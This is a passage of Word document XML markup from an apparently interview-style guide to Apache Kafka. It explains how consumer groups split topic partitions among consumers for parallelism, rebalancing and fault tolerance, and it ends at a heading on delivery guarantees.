          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful mechanism in Apache Kafka that enables </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scaling and parallel consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data across multiple consumers. It ensures that the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load is distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>processed only once per group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF335B6" w14:textId="77777777" w:rsidR="00CC2805"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CAF16CF">
          <v:rect id="_x0000_i3139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53607556" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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What Is a Consumer Group?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36824593"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a group of one or more consumer instances that </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cooperate to consume messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from one or more Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB3F05E" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>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Each consumer in the group is assigned </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a unique subset of partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819296E" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1320"/>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Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no two consumers in the same group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consume data from the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18572E4A" w14:textId="77777777" w:rsidR="00CC2805"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40ADF5C">
          <v:rect id="_x0000_i3140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="639791BD" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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How It Works?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEFD17"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Let’s say we have a topic logs with 4 partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620037BE"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logs-0, logs-1, logs-2, logs-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D674C70"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We create a consumer group log-processor with 2 consumers (C1, C2):</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6"/>
        <w:gridCol w:w="1866"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="08837511" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EEC4B6A" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A15FC79" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Assigned Consumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0773EFE6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362ECF1D"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logs-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CCC5F61"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C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="49B9648E" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C6EE00"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lastRenderedPageBreak/>
              <w:t>logs-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA52641"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C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="05171470" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6853665D"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logs-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628AE243"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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="61A72EB8" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6177B5F9"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logs-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="488CEE85"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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65B830D8"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➡️</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Each consumer reads messages from the assigned partitions </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in parallel</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, increasing throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6636ACCD" w14:textId="77777777" w:rsidR="00CC2805"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027B64B">
          <v:rect id="_x0000_i3141" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A90289C" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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How It Allows Scaling?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772D757" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>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Add more consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the group → Kafka rebalances partitions → More parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC094F" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>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Maximum number of active consumers ≤ Number of partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDFA56" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1321"/>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If a consumer crashes, Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reassigns partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to other consumers → </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E397888" w14:textId="77777777" w:rsidR="00CC2805"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E894E56">
          <v:rect id="_x0000_i3142" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1B13A" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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3"/>
        <w:gridCol w:w="4522"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="7FE657C6" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0088E447" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAA21FB" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0D1EE14D" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42C2381C"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Load Balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FEF5F11"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Distributes partitions across consumers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="286AA3F2" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74B5FD71"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Horizontal Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04C8DA48"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Add consumers to process more data in parallel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="517E5A22" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E203FB3"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Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56388620"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If a consumer dies, others take over its work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2376B71F" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7754A264"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Offset Tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E6C095"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Kafka stores offset </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>per group per partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="469C4D05" w14:textId="77777777" w:rsidTr="00CC2805">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C5BF36F"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Message Guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E96B4A1"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Each message is read by </w:t>
            </w:r>
            <w:r w:rsidRPr="008E5BA7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>one consumer per group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75438C0F" w14:textId="77777777" w:rsidR="00CC2805"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48F1315">
          <v:rect id="_x0000_i3143" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B611416" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Real-World Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C548E" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805"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If you have a topic orders with 6 partitions, and a consumer group order-processors with 3 consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095486C8" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>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Each consumer will process 2 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC36D2B" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>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If one fails, the remaining 2 will pick up the work (after </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FBB2E" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="008E5BA7" w:rsidRDefault="00CC2805" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1322"/>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Adding a 4th consumer won’t help unless the number of partitions &gt; consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC7BCC" w14:textId="77777777" w:rsidR="00CC2805" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CC280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FDBDE4C">
          <v:rect id="_x0000_i3144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543E5D8" w14:textId="31EA94CC" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00025820" w:rsidP="00025820">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="778" w:name="_Toc196308258"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain the </w:t>
      </w:r>
      <w:r w:rsidR="005C46F6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>three-message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery guarantees in Kafka and how they are implemented</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="778"/>
    </w:p>
